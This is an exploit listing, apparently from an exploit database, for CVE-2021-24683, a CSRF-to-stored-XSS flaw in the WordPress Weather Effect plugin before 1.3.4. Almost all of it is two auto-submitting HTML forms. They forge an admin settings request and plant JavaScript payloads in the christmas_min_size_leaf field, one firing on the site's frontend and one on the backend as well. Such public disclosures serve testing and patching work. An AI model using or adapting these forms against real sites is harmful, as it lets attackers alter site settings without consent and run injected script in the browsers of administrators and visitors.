Exploit for Weather Effect < 1.3.4 - CSRF to Stored Cross-Site Scripting CVE-2021-24683

Name: Exploit for Weather Effect < 1.3.4 - CSRF to Stored Cross-Site Scripting CVE-2021-24683
Rating: 5 (357 reviews)
2021-09-07 | CVSS 4.3
## https://sploitus.com/exploit?id=WPEX-ID:54F95B51-5804-4BEE-9E4A-F73B8EF9BBD5
To have the XSS only trigger in the frontend:

<form action="https://example.com/wp-admin/admin.php?page=weather-effects-setting" method="post" id="csrf">
<input type="hidden" name="enable_weather_effect" value="1">
<input type="hidden" name="weather_occasion" value="christmas_check">
<input type="hidden" name="christmas_types" value="snow_effect">
<input type="hidden" name="ball" value="ball">
<input type="hidden" name="christmas_ball" value="ball3">
<input type="hidden" name="bell" value="bell">
<input type="hidden" name="christmas_bell" value="bell3">
<input type="hidden" name="christmas_candy" value="candy3">
<input type="hidden" name="christmas_gift" value="gift3">
<input type="hidden" name="christmas_snowman" value="snowman3">
<input type="hidden" name="christmas_snow_flake" value="flack2">
<input type="hidden" name="christmas_min_size_leaf" value="alert(location)||30">
<input type="hidden" name="christmas_max_size_leaf" value="50">
<input type="hidden" name="christmas_flakes_leaf" value="5">
<input type="hidden" name="christmas_speed" value="5">
<input type="hidden" name="snow_action" value="save_setting">
</form>
<script>csrf.submit()</script>

XSS Trigger in the backend as well:
<form action="https://example.com/wp-admin/admin.php?page=weather-effects-setting" method="post" id="csrf">
<input type="hidden" name="enable_weather_effect" value="1">
<input type="hidden" name="weather_occasion" value="christmas_check">
<input type="hidden" name="christmas_types" value="snow_effect">
<input type="hidden" name="ball" value="ball">
<input type="hidden" name="christmas_ball" value="ball3">
<input type="hidden" name="bell" value="bell">
<input type="hidden" name="christmas_bell" value="bell3">
<input type="hidden" name="christmas_candy" value="candy3">
<input type="hidden" name="christmas_gift" value="gift3">
<input type="hidden" name="christmas_snowman" value="snowman3">
<input type="hidden" name="christmas_snow_flake" value="flack2">
<input type="hidden" name="christmas_min_size_leaf" value='"><img src onerror=alert(/XSS/)>'>
<input type="hidden" name="christmas_max_size_leaf" value="50">
<input type="hidden" name="christmas_flakes_leaf" value="5">
<input type="hidden" name="christmas_speed" value="5">
<input type="hidden" name="snow_action" value="save_setting">
</form>
<script>csrf.submit()</script>